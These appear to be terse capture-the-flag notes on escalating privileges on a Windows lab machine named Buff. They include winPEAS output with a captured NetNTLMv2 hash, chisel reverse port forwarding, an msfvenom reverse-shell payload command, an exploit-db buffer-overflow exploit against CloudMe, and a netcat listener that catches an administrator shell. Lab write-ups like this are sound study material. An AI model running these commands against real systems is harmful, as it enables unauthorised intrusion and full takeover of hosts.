4 privesc
powershell -c ". .\PowerUp.ps1"
. : File C:\Users\shaun\Desktop\PowerUp.ps1 cannot be loaded because running scripts is disabled on this system.
PEAS
[+] Interesting Processes -non Microsoft-
[?] Check if any interesting processes for memory dump or if you could overwrite some binary running https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes
mysqld(1616)[C:\xampp\mysql\bin\mysqld.exe] -- POwn: shaun
Permissions: Authenticated Users [WriteData/CreateFiles]
Possible DLL Hijacking folder: C:\xampp\mysql\bin (Authenticated Users [WriteData/CreateFiles])
Command Line: mysql\bin\mysqld.exe --defaults-file=mysql\bin\my.ini --standalone
[+] Installed Applications --Via Program Files/Uninstall registry--
C:\xampp(Authenticated Users [WriteData/CreateFiles])
[+] Current TCP Listening Ports
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 127.0.0.1 8888 0.0.0.0 0 Listening 7844 CloudMe
TCP 127.0.0.1 50119 127.0.0.1 3306 Time Wait 0 Idle
[+] Enumerating Security Packages Credentials
Version: NetNTLMv2
Hash: shaun::BUFF:1122334455667788:82c51e794ecf6f8f2601e92f9f427604:0101000000000000f2a22adb5862d7018d58da0f88d54b4a000000000800300030000000000000000000000000200000809e2636c947a3055d0f688790b7439ceadd4b45d1e2e159332d222c915cfe400a00100000000000000000000000000000000000090000000000000000000000
XAMPP config file is at \xampp\phpMyAdmin\config.inc.php
XAMPP default-passwords file is at \xampp\passwords.txt
type config.inc.php
/* Authentication type and info */
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
Mysql is not connecting, trying other avenues.
tasklist /v
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
CloudMe.exe 6996 0 26,948 K Unknown N/A 0:00:02 N/A
CloudMe 1.11.2 is running on port 8888, has BufferOverflow Exploit We need to port forward using chisel
$ chisel server -p 9000 --reverse
2021/06/15 22:03:25 server: Reverse tunnelling enabled
2021/06/15 22:03:25 server: Fingerprint Es2IzsdBxZvBH7IA83XgPvjVBg7LwkSXPpU6skdoAro=
2021/06/15 22:03:25 server: Listening on http://0.0.0.0:9000
2021/06/15 22:04:47 server: session#1: Client version (1.7.6) differs from server version (0.0.0-src)
2021/06/15 22:04:47 server: session#1: tun: proxy#R:8989=>8888: Listening
> chisel.exe client -v 10.10.16.161:9000 R:8989:127.0.0.1:8888
Using https://www.exploit-db.com/exploits/48389
# msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.16.161 LPORT=9090 -b '\x00\x0A\x0D' -f python -v payload
$ python ex.py
$ rlwrap nc -lvnp 9090
listening on [any] 9090 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.198] 49709
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
buff\administrator
Last updated